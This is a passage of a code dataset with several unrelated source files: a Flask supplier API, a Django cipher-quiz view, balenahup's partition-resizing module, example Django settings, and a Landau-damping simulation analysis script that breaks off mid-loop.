jsonify\nfrom flask_login import login_required\nfrom app.api import api\nfrom app.utils import get_json_from_request\nfrom app.api.suppliers import get_supplier, update_supplier, list_suppliers\nfrom app.api.helpers import role_required, is_current_supplier\n\n\n@api.route('/suppliers/', methods=['GET'], endpoint='get_supplier')\n@login_required\n@role_required('buyer', 'supplier')\n@is_current_supplier\ndef get(code):\n \"\"\"A supplier (role=buyer,supplier)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n parameters:\n - name: code\n in: path\n type: integer\n required: true\n default: all\n definitions:\n SupplierService:\n type: object\n properties:\n id:\n type: integer\n name:\n type: string\n subCategories:\n type: array\n items:\n $ref: '#/definitions/SupplierCategory'\n SupplierCategory:\n type: object\n properties:\n id:\n type: integer\n name:\n type: string\n Supplier:\n type: object\n properties:\n abn:\n type: string\n address_address_line:\n type: string\n address_country:\n type: string\n address_postal_code:\n type: string\n address_state:\n type: string\n address_suburb:\n type: string\n category_name:\n type: string\n code:\n type: string\n contact_email:\n type: string\n contact_name:\n type: string\n contact_phone:\n type: string\n email:\n type: string\n id:\n type: number\n linkedin:\n type: string\n name:\n type: string\n phone:\n type: string\n regions:\n type: array\n items:\n type: object\n properties:\n name:\n type: string\n state:\n type: string\n representative:\n type: string\n services:\n type: array\n items:\n $ref: '#/definitions/SupplierService'\n summary:\n type: string\n website:\n type: string\n responses:\n 200:\n description: A supplier\n type: object\n schema:\n $ref: '#/definitions/Supplier'\n \"\"\"\n return get_supplier(code)\n\n\n@api.route('/suppliers/', methods=['POST'], endpoint='update_supplier')\n@login_required\n@role_required('buyer', 'supplier')\n@is_current_supplier\ndef update(code):\n \"\"\"Update a supplier (role=buyer,supplier)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n parameters:\n - name: code\n in: path\n type: integer\n required: true\n default: all\n responses:\n 200:\n description: A supplier\n type: object\n schema:\n $ref: '#/definitions/Supplier'\n \"\"\"\n try:\n json_payload = get_json_from_request()\n supplier = update_supplier(code, **json_payload)\n\n return jsonify(supplier.serializable), 200\n\n except Exception as error:\n return jsonify(message=error.message), 400\n\n\n@api.route('/suppliers', methods=['GET'], endpoint='list_suppliers')\n@login_required\n@role_required('buyer')\ndef get_list():\n \"\"\"All suppliers grouped by category (role=buyer)\n ---\n tags:\n - suppliers\n security:\n - basicAuth: []\n responses:\n 200:\n description: A supplier\n type: object\n properties:\n categories:\n type: array\n items:\n type: object\n properties:\n name:\n type: string\n suppliers:\n type: array\n items:\n type: object\n properties:\n code:\n type: integer\n name:\n type: string\n \"\"\"\n return list_suppliers()\n","repo_name":"shanec1802/orams","sub_path":"backend/app/api/views/suppliers.py","file_name":"suppliers.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19530656625","text":"from django.shortcuts import render\nfrom .models import CnsQuiz\nfrom django.http import HttpResponse\nimport collections\n\n# Create your views here.\n\ndef cnsLab(request):\n result = CnsQuiz.objects.all()\n data ={'Exams': result}\n return render(request, 'cnsLab/index.html' , data)\n\ndef encrpyText(request):\n encrptionText = (request.GET.get('text','default'))\n keyvalue = (request.GET.get('keyvalue', 'default'))\n cipherText = (request.GET.get('cipherText', 'default'))\n \n convertedInput = []\n convertedOutput = []\n if keyvalue == \"3\":\n for char in encrptionText:\n convertedInput.append(ord(char))\n\n finalInput = [ x + 3 for x in convertedInput]\n \n for char in cipherText:\n convertedOutput.append(ord(char))\n params ={'cipherText':cipherText, 'encrptionText':encrptionText}\n if collections.Counter(finalInput) == collections.Counter(convertedOutput):\n return render(request, 'cnsLab/result.html' , params )\n \n else:\n message = \" You tried well but your anser is incoorect\"\n params ={'cipherText':cipherText, 'encrptionText':encrptionText , 'message': message}\n return render(request, 'cnsLab/result.html' , params )\n\n else:\n return HttpResponse(\"failure\") \n\n \n\n\n\n","repo_name":"kushal-chaurasia/virtual-lab","sub_path":"cnsLab/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"71571001014","text":"#!/usr/bin/env python3\n\n#\n# ** License **\n#\n# Home: http://resin.io\n#\n# Author: Andrei Gherzan \n#\n\nimport sys\nimport logging\nimport parted\nimport os\nimport tempfile\nimport unittest\nimport shutil\nfrom .util import *\nfrom .bootconf import *\nfrom .colorlogging import *\n\nclass Repartitioner(object):\n def __init__ (self, conf, testMode=False):\n self.conf = conf\n self.testMode = testMode\n self.resinBootPartPath = getBootPartition(conf)\n self.currentResinRootPartPath = getRootPartition(conf)\n\n self.device = parted.getDevice(getRootDevice(conf))\n self.disk = parted.newDisk(self.device)\n\n def editPartition(self, targetPartition, deltaStart, deltaEnd, fstype, fslabel, unit='MiB', formatPartition=True, safeDataThroughTmp=False):\n log.info(\"editPartition: Editing partition \" + targetPartition.path + \". Start = Start + (\" + str(deltaStart) + \"). End = End + (\" + str(deltaEnd) + \").\")\n\n # Backup data to a directory in tmp\n if safeDataThroughTmp:\n # Make sure targetPartition is mounted in mountpoint\n if isMounted(targetPartition.path):\n mountpoint = getMountpoint(targetPartition.path)\n else:\n try:\n mountpoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"editPartition: Failed to create temporary mountpoint.\")\n return False\n if not mount(targetPartition.path, mountpoint):\n log.error(\"editPartition: Failed to mount %s in %s.\" %(targetPartition.path, mountpoint))\n return False\n\n # Backup files to a directory in /tmp\n try:\n backupdir = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"editPartition: Failed to create temporary backup directory.\")\n return False\n if not safeCopy(mountpoint, backupdir):\n log.error(\"editPartition: Could not backup files from %s to %s.\" %(mountpoint, backupdir))\n\n # Make sure that partition is not mounted\n if isMounted(targetPartition.path):\n if not umount(targetPartition.path):\n return False\n\n # Committing partition changes to OS needs udev running\n startUdevDaemon()\n\n # Calculate the new geometry\n geometry = targetPartition.geometry\n geometry.start += parted.sizeToSectors(deltaStart, unit, self.device.sectorSize)\n geometry.end += parted.sizeToSectors(deltaEnd, unit, self.device.sectorSize)\n\n # Destroy the partition and recreate it with the new geometry\n self.disk.deletePartition(targetPartition)\n filesystem = parted.FileSystem(type=fstype, geometry=geometry)\n partition = parted.Partition(disk=self.disk, type=parted.PARTITION_NORMAL, fs=filesystem, geometry=geometry)\n self.disk.addPartition(partition=partition, constraint=self.device.optimalAlignedConstraint)\n self.disk.commit()\n\n # Format filesystem\n if formatPartition:\n if (fstype == 'ext3') or (fstype == 'ext4'):\n if not formatEXT3(partition.path, fslabel):\n log.error(\"movePartition: Could not format \" + partition.path + \" as ext3.\")\n return False\n elif fstype == 'fat32':\n if not formatVFAT(partition.path, fslabel):\n log.error(\"movePartition: Could not format \" + partition.path + \" as vfat.\")\n return False\n else:\n log.error(\"movePartition: Format of \" + fstype + \" is not implemented.\")\n return False\n\n # Restore data in targetPartition\n if safeDataThroughTmp:\n # Make sure targetPartition is mounted in mountpoint\n if isMounted(targetPartition.path):\n log.error(\"editPartition: Something is wrong. %s should not be mounted.\" % targetPartition.path)\n return False\n else:\n if not mount(targetPartition.path, mountpoint):\n log.error(\"editPartition: Failed to mount %s in %s.\" %(targetPartition.path, mountpoint))\n return False\n\n # Copy back the data\n if not safeCopy(backupdir, mountpoint, sync=True):\n log.error(\"editPartition: Could not restore files from %s to %s.\" %(backupdir, mountpoint))\n\n # Cleanup temporary backup files\n shutil.rmtree(backupdir)\n\n return True\n\n def increaseResinBootTo(self, size, unit='MiB'):\n #\n # +----------------------------------------+---+\n # | Boot from resin-root | |\n # +-------->+ length(resin-root)!=length(resin-updt) | E |\n # +----------------------------------------+---+\n #\n #\n #\n #\n #\n #\n # a1 - shrink resin-updt from left\n # a2 - copy resin-root to resin-updt\n # a3 - configure bootloader to boot from resin-updt\n # +----------------------------------------+---+ a4 - reboot system +----------------------------------------+---+\n # | Boot from resin-root | | | Boot from resin-updt | |\n # +--------->+ length(resin-root)==length(resin-updt) | A +-----------------------------------------------------------^+ length(resin-root)!=length(resin-updt) | C |\n # +-----+----------------------------------+---+ +------+---------------------------------+---+\n # ^ |\n # | |\n # | b1 - copy resin-updt to resin-root | c1 - shrink and move resin-boot\n # | b2 - configure bootloader to boot from resin-root | c2 - expand resin-boot\n # | b3 - reboot system +\n # | V\n # +-----+----------------------------------+---+ +--------------------------+\n # | Boot from resin-updt | | | Done |\n # +--------->+ length(resin-root)==length(resin-updt) | B | | resin-boot expanded |\n # +----------------------------------------+---+ +--------------------------+\n #\n log.info(\"increaseResinBootTo: Increasing boot partition to \" + str(size) + \".\")\n\n resinBootPart = self.disk.getPartitionByPath(self.resinBootPartPath)\n resinRootPart = self.disk.getPartitionByPath(getPartitionRelativeToBoot(self.conf, 'resin-root', 1)) # resin-root is the first partition after resin-boot\n resinUpdtPart = self.disk.getPartitionByPath(getPartitionRelativeToBoot(self.conf, 'resin-updt', 2)) # resin-updt is the second partition after resin-boot\n\n # How much we need to increase resin-boot\n deltasize = int(size) - int(resinBootPart.getLength(unit))\n\n # Are we there yet?\n if resinBootPart.getLength(unit) >= size:\n # State D\n log.debug(\"increaseResinBootTo: Size already greater than \" + str(size) + unit + \".\")\n return True\n\n if self.currentResinRootPartPath == resinRootPart.path:\n # Booted from resin-root\n if resinRootPart.getLength(unit) == resinUpdtPart.getLength(unit):\n #\n # State A\n #\n log.debug(\"Running transition from State A...\")\n\n # Edit resin-updt partition\n if not self.editPartition(targetPartition=resinUpdtPart, deltaStart=(deltasize // 2), deltaEnd=0, fstype='ext4', fslabel='resin-updt', unit=unit, formatPartition=True):\n log.error(\"increaseResinBootTo: Could not edit resin-updt partition.\")\n return False\n\n # Copy resin-root to resin-updt\n log.info(\"increaseResinBootTo: Copying resin-root to resin-updt. This will take a while...\")\n resinRootMountPoint = getConfigurationItem(self.conf, 'General', 'host_bind_mount')\n if not resinRootMountPoint:\n resinRootMountPoint = '/'\n try:\n resinUpdtMountPoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"increaseResinBootTo: Failed to create temporary mountpoint.\")\n return False\n if not mount(resinUpdtPart.path, resinUpdtMountPoint):\n log.error(\"increaseResinBootTo: Failed to mount \" + resinUpdtPart.path + \" to \" + resinUpdtMountPoint + \".\")\n if not safeCopy(resinRootMountPoint, resinUpdtMountPoint, sync=False):\n log.error(\"increaseResinBootTo: Failed to copy files from \" + resinRootMountPoint + \" to \" + resinUpdtMountPoint + \".\")\n umount(resinUpdtMountPoint) # We fail anyway so don't care out return value\n return False\n if not umount(resinUpdtMountPoint):\n log.error(\"increaseResinBootTo: Failed to unmount \" + resinUpdtMountPoint + \".\")\n return False\n\n # Configure bootloader\n if not configureBootloader(self.currentResinRootPartPath, resinUpdtPart.path, self.conf):\n log.error(\"increaseResinBootTo: Could not configure bootloader.\")\n return False\n\n # We exit cause this is an intermediate repartitioning step and reboot is needed\n if not self.testMode:\n sys.exit(2)\n else:\n #\n # State E\n #\n log.debug(\"Running transition from State E...\")\n\n log.error(\"increaseResinBootTo: Unknown filesystem state where booted from resin-boot but having different size then resin-updt.\")\n return False\n\n elif self.currentResinRootPartPath == resinUpdtPart.path:\n # Booted from resin-updt\n if resinRootPart.getLength(unit) == resinUpdtPart.getLength(unit):\n #\n # State B\n #\n log.debug(\"Running transition from State B...\")\n\n # Format resin-root\n if not formatEXT3(resinRootPart.path, 'resin-root'):\n log.error(\"increaseResinBootTo: Could not format \" + resinRootPart.path + \" as ext3.\")\n return False\n\n # Copy resin-updt to resin-root\n log.info(\"increaseResinBootTo: Copying resin-updt to resin-root. This will take a while...\")\n resinUpdtMountPoint = getConfigurationItem(self.conf, 'General', 'host_bind_mount')\n if not resinUpdtMountPoint:\n resinUpdtMountPoint = '/'\n try:\n resinRootMountPoint = tempfile.mkdtemp(prefix='resinhup-', dir='/tmp')\n except:\n log.error(\"increaseResinBootTo: Failed to create temporary mountpoint.\")\n return False\n if not mount(resinRootPart.path, resinRootMountPoint):\n log.error(\"increaseResinBootTo: Failed to mount \" + resinRootPart.path + \" to \" + resinRootMountPoint + \".\")\n if not safeCopy(resinUpdtMountPoint, resinRootMountPoint, sync=False):\n log.error(\"increaseResinBootTo: Failed to copy files from \" + resinUpdtMountPoint + \" to \" + resinRootMountPoint + \".\")\n umount(resinRootMountPoint) # We fail anyway so don't care out return value\n return False\n if not umount(resinRootMountPoint):\n log.error(\"increaseResinBootTo: Failed to unmount \" + resinRootMountPoint + \".\")\n return False\n\n # Configure bootloader\n if not configureBootloader(self.currentResinRootPartPath, resinRootPart.path, self.conf):\n log.error(\"increaseResinBootTo: Could not configure bootloader.\")\n return False\n\n # We exit cause this is an intermediate repartitioning step and reboot is needed\n if not self.testMode:\n sys.exit(2)\n else:\n #\n # State C\n #\n log.debug(\"Running transition from State C...\")\n\n # Edit resin-root partition\n if not self.editPartition(targetPartition=resinRootPart, deltaStart=(deltasize), deltaEnd=(deltasize // 2), fstype='ext4', fslabel='resin-root', unit=unit, formatPartition=True):\n log.error(\"increaseResinBootTo: Could not edit resin-root partition.\")\n return False\n\n # Expand resin-boot\n if not self.editPartition(targetPartition=resinBootPart, deltaStart=0, deltaEnd=deltasize, fstype='fat32', fslabel='resin-boot', unit=unit, formatPartition=True, safeDataThroughTmp=True):\n log.error(\"increaseResinBootTo: Could not edit resin-boot partition.\")\n return False\n\n return True\n else:\n log.error(\"increaseResinBootTo: Unknown root partition.\")\n return False\n\n return True\n\nclass MyTest(unittest.TestCase):\n def testRun(self):\n # Logger\n log = logging.getLogger()\n log.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setFormatter(ColoredFormatter(True))\n log.addHandler(ch)\n\n # Hope this works :)\n r = Repartitioner(conf='conf/resinhup.conf', testMode=True) # Running this in test mode to avoid rebooting automatically\n self.assertTrue(r.increaseResinBootTo(22))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"balena-os/balenahup","sub_path":"app/modules/repartitioner.py","file_name":"repartitioner.py","file_ext":"py","file_size_in_byte":15033,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"24330910513","text":"import os\nfrom django.contrib.messages import constants as messages\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ''\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n\n 'bootstrap4',\n 'core',\n 'product',\n 'order',\n 'feedback',\n\n 'mptt',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.facebook',\n 'allauth.socialaccount.providers.google',\n 'allauth.socialaccount.providers.vk',\n]\n\nLOGIN_REDIRECT_URL = '/'\nSITE_ID = 1\n\nACCOUNT_LOGIN_ATTEMPTS_LIMIT = 5\nACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 60\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_AUTHENTICATION_METHOD = 'email'\n\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-secondary',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\nROOT_URLCONF = 'e_shop.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'product.context_processors.category_tree',\n 'product.context_processors.feedback_form',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'e_shop.wsgi.application'\n\n\n# Database\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n\nLANGUAGE_CODE = 'ru'\n\nTIME_ZONE = 'Asia/Bishkek'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nUSE_THOUSAND_SEPARATOR = True\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n","repo_name":"aitmrza/e_shop","sub_path":"e_shop/example_settings.py","file_name":"example_settings.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70466471092","text":"# Code to import and run epc1d functions\n\nfrom epc1d_Opt2 import *\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\nimport numpy as np\nfrom matplotlib.pyplot import cm\nfrom timeit import default_timer as timer\nfrom scipy.stats import linregress\n\ndef r_squared(data, fit):\n\t\"\"\" Calculate the R^2 value of a fit, f, to a data set, x \"\"\"\n\t\n\tif len(data) != len(fit):\n\t\tprint(\"Data and fit lists must be of equal length\")\n\t\treturn None\n\n\tm = np.sum(data)/len(data)\n\t\n\t# Sum of squares between data and mean\n\tss = np.sum((data-m)**2)\n\t\n\t# Sum of residuals between fit and data \n\tres = np.sum((data-fit)**2)\n\t\t\n\t# This is the definition of R^2\n\treturn \t1 - res/ss\n\ndef task1_noiseAmplitude(noiseLevelThresholdR, L, ncells, npart):\n plt.show()\n samples = len(noiseLevelThresholdR)\n plt.boxplot(noiseLevelThresholdR)\n plt.ylabel(\"Noise Ampitude Threshold\")\n plt.title(\"L={0:.2f}; ncells={1}; npart={2}; samples={3}\".format(L,ncells,npart,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold: Boxplot\")\n print(\"Mean noiseAmplitudes: \", np.mean(noiseLevelThresholdR))\n print(\"SD Sample noiseAmplitudes: \", np.std(noiseLevelThresholdR, ddof=1))\n print(\"SE Sample noiseAmplitudes: \", np.std(noiseLevelThresholdR, ddof=1)/np.sqrt(samples))\n plt.show()\n\ndef task1_noiseAmplitudeCells(noiseLevelThresholdR, L, ncellsR, npart, samples):\n\n # Preprocess, initialise\n ncellsUniqueSorted = np.unique(ncellsR)\n means = np.zeros(len(ncellsUniqueSorted))\n stdErrs = np.zeros(len(ncellsUniqueSorted))\n stdDevsSample = np.zeros(len(ncellsUniqueSorted))\n\n # Calculate standard errors and means\n for iNcell in range(len(ncellsUniqueSorted)):\n means[iNcell] = np.mean(noiseLevelThresholdR[np.where(ncellsR == ncellsUniqueSorted[iNcell])])\n stdDevsSample[iNcell] = np.std(noiseLevelThresholdR[np.where(ncellsR == ncellsUniqueSorted[iNcell])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n ncellsNoiseFitCoeffs = np.polyfit(ncellsUniqueSorted, means, 2)\n ncellsNoiseFitF = np.poly1d(ncellsNoiseFitCoeffs)\n fitValues = ncellsNoiseFitF(ncellsUniqueSorted)\n rsquared = r_squared(means,fitValues)\n\n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Noise Ampitude Threshold\")\n plt.xlabel(\"Number of Cells\")\n plt.errorbar(ncellsUniqueSorted,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Noise Amplitude Error Range\")\n plt.plot(ncellsUniqueSorted, ncellsNoiseFitF(ncellsUniqueSorted), linestyle='dashed',label=r\"Polyfit: \" + '{}'.format(ncellsNoiseFitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n plt.title(\"L={0:.2f}; npart={1}; samples={2}\".format(L,npart,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold vs Cells\")\n plt.legend()\n plt.show()\n \n print(\"ncellsUniqueSorted: \", ncellsUniqueSorted)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task1_noiseAmplitudeParticles(noiseLevelThresholdR, L, ncells, npartR, samples):\n\n # Preprocess, initialise\n nParticlesUniqueSorted = np.unique(npartR)\n means = np.zeros(len(nParticlesUniqueSorted))\n stdErrs = np.zeros(len(nParticlesUniqueSorted))\n stdDevsSample = np.zeros(len(nParticlesUniqueSorted))\n\n # Calculate standard errors and means\n for iNParticle in range(len(nParticlesUniqueSorted)):\n means[iNParticle] = np.mean(noiseLevelThresholdR[np.where(npartR == nParticlesUniqueSorted[iNParticle])])\n stdDevsSample[iNParticle] = np.std(noiseLevelThresholdR[np.where(npartR == nParticlesUniqueSorted[iNParticle])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n nParticlesNoiseFitCoeffs = np.polyfit(nParticlesUniqueSorted, np.log(means), 1)\n nParticlesNoiseFitF = np.poly1d(nParticlesNoiseFitCoeffs)\n fitValues = np.exp(nParticlesNoiseFitF(nParticlesUniqueSorted))\n rsquared = r_squared(means,np.log(fitValues))\n\n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Noise Ampitude Threshold\")\n plt.xlabel(\"Number of Particles\")\n plt.errorbar(nParticlesUniqueSorted,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Noise Amplitude Error Range\")\n plt.plot(nParticlesUniqueSorted, fitValues, linestyle='dashed',label=r\"Polyfit of log: \" + '{}'.format(nParticlesNoiseFitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n plt.yscale('log')\n plt.title(\"L={0:.2f}; ncells={1}; samples={2}\".format(L,ncells,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold vs Particles\")\n plt.legend()\n plt.show()\n \n print(\"ncellsUniqueSorted: \", nParticlesUniqueSorted)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task1_computationalTime(noiseLevelThresholdR, L, ncellsR, npartR, samples, timeR):\n if len(np.unique(ncellsR))==1: # Convenience for using same funciton for both cells or particles relationship\n mode = 1 # ncells same; nparticles change\n x_unsorted = npartR\n varText = \"Particles\"\n else:\n mode = 2 # nparticles same; ncells change\n x_unsorted = ncellsR\n varText = \"Cells\"\n\n # Preprocess, initialise\n x = np.unique(x_unsorted)\n means = np.zeros(len(x))\n stdErrs = np.zeros(len(x))\n stdDevsSample = np.zeros(len(x))\n\n # Calculate standard errors and means\n for i in range(len(x)):\n means[i] = np.mean(timeR[np.where(x_unsorted == x[i])])\n stdDevsSample[i] = np.std(timeR[np.where(x_unsorted == x[i])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n fitCoeffs = np.polyfit(x, means, 1)\n fitF = np.poly1d(fitCoeffs)\n fitValues = fitF(x)\n rsquared = r_squared(means,fitValues)\n \n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Time [s]\")\n plt.xlabel(\"Number of \"+varText)\n plt.errorbar(x,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Computational Time; Standard Errors\")\n plt.plot(x, fitValues, linestyle='dashed',label=r\"Polyfit: \" + '{}'.format(fitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n #plt.yscale('log')\n if mode == 1:\n plt.title(\"L={0:.2f}; ncells={1}; samples={2}\".format(L,ncellsR[0],samples))\n else:\n plt.title(\"L={0:.2f}; npart={1}; samples={2}\".format(L,npartR[0],samples))\n plt.suptitle(\"Landau Damping Computational Time vs \"+varText)\n plt.legend()\n plt.show()\n\n print(varText,\": \", x)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task2_peakFrequency(L, ncells, npart, samples, oscFrequency):\n mean = np.mean(oscFrequency)\n stdDevSample = np.std(oscFrequency, ddof=1)\n stdErrSample = stdDevSample/np.sqrt(len(oscFrequency))\n\n plt.close(\"all\")\n plt.boxplot(oscFrequency)\n plt.errorbar(1,mean,yerr=stdErrSample,marker='o',linestyle='none',uplims=True, lolims=True,label=\"Means and Standard Error\")\n plt.ylabel(\"Frequncy (Normalised)\")\n plt.title(\"L={0:.2f}; ncells={1}; npart={2}; simulations={3};\".format(L,ncells,npart,samples))\n plt.suptitle(\"Landau Damping Frequency: Boxplot\")\n print(\"Mean Frequency: \", np.mean(oscFrequency))\n print(\"SD Sample Frequency: \", np.std(oscFrequency, ddof=1))\n print(\"SE Frequency: \", stdErrSample)\n plt.legend()\n plt.show()\n oscFreqMean = mean\n oscFreqSe = stdErrSample\n\n return oscFreqMean, oscFreqSe \n\ndef task2_globalPeakFit(L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe):\n result = linregress(goodPeakTimes,np.log(goodPeakAmplitudes))\n print(result)\n print(\"On Linear scale, Std Error of slope = \", np.exp(result.stderr))\n print(\"On Linear scale, Std Error of intercept = \", np.exp(result.intercept_stderr))\n \n plt.close(\"all\")\n plt.plot(goodPeakTimes,goodPeakAmplitudes,'o',label=\"Low Noise First Harmonic Peaks\")\n plt.plot(goodPeakTimes, np.exp(result.intercept + result.slope*goodPeakTimes), label='Fitted line')\n plt.title(\"L={0:.2f}; npart={1}; ncells={2}; simulations={3}\".format(L,npart,ncells,samples))\n plt.suptitle(\"Landau Damping Dampening rate curve fit\")\n plt.xlabel(\"Time [s]\")\n plt.ylabel(\"First Harmonic Amplitude peaks\")\n plt.yscale('log')\n plt.legend()\n plt.show()\n\n # Damping ratio, angular freq\n #dampingRatio = result.slope/oscFreqMean\n dampingRatio = result.slope/sqrt(result.slope**2 + oscFreqMean**2)\n dampingRatioSe = sqrt(oscFreqSe**2 + result.stderr**2)\n decayRate = result.slope\n decayRateSe = result.stderr\n print(\"angular freq = \", oscFreqMean, \"+-\", oscFreqSe)\n print(\"damping ratio = \", dampingRatio, \"+-\", dampingRatioSe)\n print(\"decay rate: \", result.slope, \"+-\", result.stderr)\n return decayRate, decayRateSe\n\nif __name__ == \"__main__\":\n \n PLOTS = False\n\n # Configuration (All configurable to include multiple values to loop through)\n samples = 100\n L_ = [4.*pi]\n # npart_ = [500, 1000, 2000, 5000, 10000, 15000, 20000, 25000, 30000, 50000]\n npart_ = [1000]\n ncells_ = [8]\n # ncells_ = [10, 50, 100, 150, 200, 250, 300]\n\n # Initialisations\n i0 = -1\n i1 = -1 # iterators\n i2 = -1\n i3 = -1\n \n # alligned results arrays (all of same length and same simulation, in case multi-d analysis is reqd)\n npartR = np.array([]) # results arrays\n rsiR = np.array([])\n ncellsR = np.array([])\n LR = np.array([])\n timeR = np.array([])\n noiseLevelThresholdR = np.array([])\n\n # independent results arrays\n oscFrequency = np.array([]) # not alligned with R variables\n goodPeakAmplitudes = np.array([])\n goodPeakTimes = np.array([])\n\n # Unique colors\n color = iter(cm.rainbow(np.linspace(0, 1, samples)))\n\n for rseed in range(samples): # Loop through for repeats; stats\n i0 += 1\n c = next(color) # Plot color iterate\n random.seed(i0) # random seed fix for when needed to compare if optimisation makes a difference from original source\n\n for L in L_: # Loop through different values of L\n i1 += 1 \n\n for npart in npart_: # Loop through values of nparts\n i2 += 1\n \n for ncells in ncells_: # Loop through values of ncells\n i3 += 1\n\n # Run the main sim\n timeStart = timer()\n pos, vel = landau(npart, L)\n s = Summary()\n run(pos, vel, L, ncells, [s], linspace(0.,20,50))\n timeStop = timer()\n \n\n # Convert to ndarray for convenience\n s.t = array(s.t)\n s.firstharmonic = array(s.firstharmonic)\n\n # Plot for debug visualisation; can comment out if not needed\n plt.plot(s.t, s.firstharmonic, label=r\"First harmonic amplitude [Normalised]\", c = c)\n plt.yscale('log')\n plt.xlabel(\"Time [Normalised]\")\n plt.ylabel(\"First harmonic amplitude [Normalised]\")\n plt.yscale('log')\n plt.title(\"L={0:.2f}; ncells={1}; npart={2}\".format(L,ncells,npart))\n plt.suptitle(\"Landau Damping First Harmonic\")\n\n # Find peaks\n peaksI, peakProperties = find_peaks(s.firstharmonic) # indexes of peaks\n peaks = s.firstharmonic[peaksI]\n\n # Plot peaks\n plt.plot(s.t[peaksI], s.firstharmonic[peaksI], marker='o', linestyle='none',label=r\"Peaks\", c = c)\n\n # Find the last good peak / last bad peak\n peaksDiff = np.ediff1d(s.firstharmonic[peaksI]) # diff between consecutive values\n risePeaksIndices, = np.where(peaksDiff>0) # offset by one, since it's diff\n if len(risePeaksIndices) ==0: # if no negative peak difference\n 